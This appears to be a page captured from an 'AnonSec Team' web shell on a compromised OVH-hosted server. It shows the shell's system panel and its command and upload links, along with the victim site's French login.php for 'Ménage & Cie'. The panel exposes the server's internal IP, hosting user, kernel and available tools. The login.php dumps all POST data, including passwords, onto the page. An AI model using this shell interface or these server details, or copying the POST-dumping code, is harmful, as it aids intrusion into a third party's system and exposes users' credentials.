AnonSec Team
Server IP : 10.128.40.6  /  Your IP : 216.73.217.20
Web Server : Apache
System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : logmcpe ( 111175)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/logmcpe/www/TEST/www/../../MCPRO/css/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/logmcpe/www/TEST/www/../../MCPRO/css/../login.php
<?php
setcookie('login') ;
include "includes/config.php";
include "includes/php-dbi.php";
include "includes/functions.php";
//include "includes/$user_inc";
include "includes/connect.php";
session_unset() ;
echo '<pre>';
print_r($_POST);
echo '</pre>';
?>
<!DOCTYPE html
    PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "DTD/html4-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>M&eacute;nage &amp; Cie</title>
<script type="text/javascript">
// error check login/password
function valid_form ( form ) {
  if ( form.login.value.length == 0 || form.password.value.length == 0 ) {
    alert ( "Vous devez saisir un identifiant et un mot de passe." );
    return false;
  }
  return true;
}
</script>
<style type="text/css">

label {
  font-weight: bold;
  color: #666699;
}
#login {
  margin-top: 70px;
  margin-bottom: 50px;
  text-align: center;
  color: #666699;
}
#login table {
  border: 1px solid #666699;;
  background-color: #EAEAE1;
  font-size: 12px;
  color: #666699;
}
.bigbutton {
	padding:4px; font-weight:bold;
	color: #666699;
}

</style>
</head>
<body>

<h2 style="color: #666699;">M&eacute;nage &amp; Cie</h2>

<br />
<form id="login" action="./" method="post" onSubmit="return valid_form(this)">
<table cellpadding="10" align="center">
<tr><td rowspan="2">
 <img src="login.gif" alt="Login" /></td><td align="right">
 <label for="user">Identifiant :</label></td><td>
 <input name="login" id="user" size="15" maxlength="25" value="" tabindex="1" />
</td></tr>
<tr><td style="text-align:right;">
 <label for="password">Mot de passe :</label></td><td>

 <input name="password" id="password" type="password" size="15" maxlength="30" tabindex="2" />
</td></tr>
<tr><td colspan="3" style="text-align:center;">
 <input type="checkbox" name="remember" id="remember" tabindex="3" value="yes"  /><label for="remember">&nbsp;Enregistrer les informations de connexions</label>
</td></tr>
<tr><td colspan="4" style="text-align:center;">
 <input type="submit" class="bigbutton" value="Connexion" tabindex="4" />
</td></tr>
</table>
</form>
</body>
</html>

AnonSec - 2021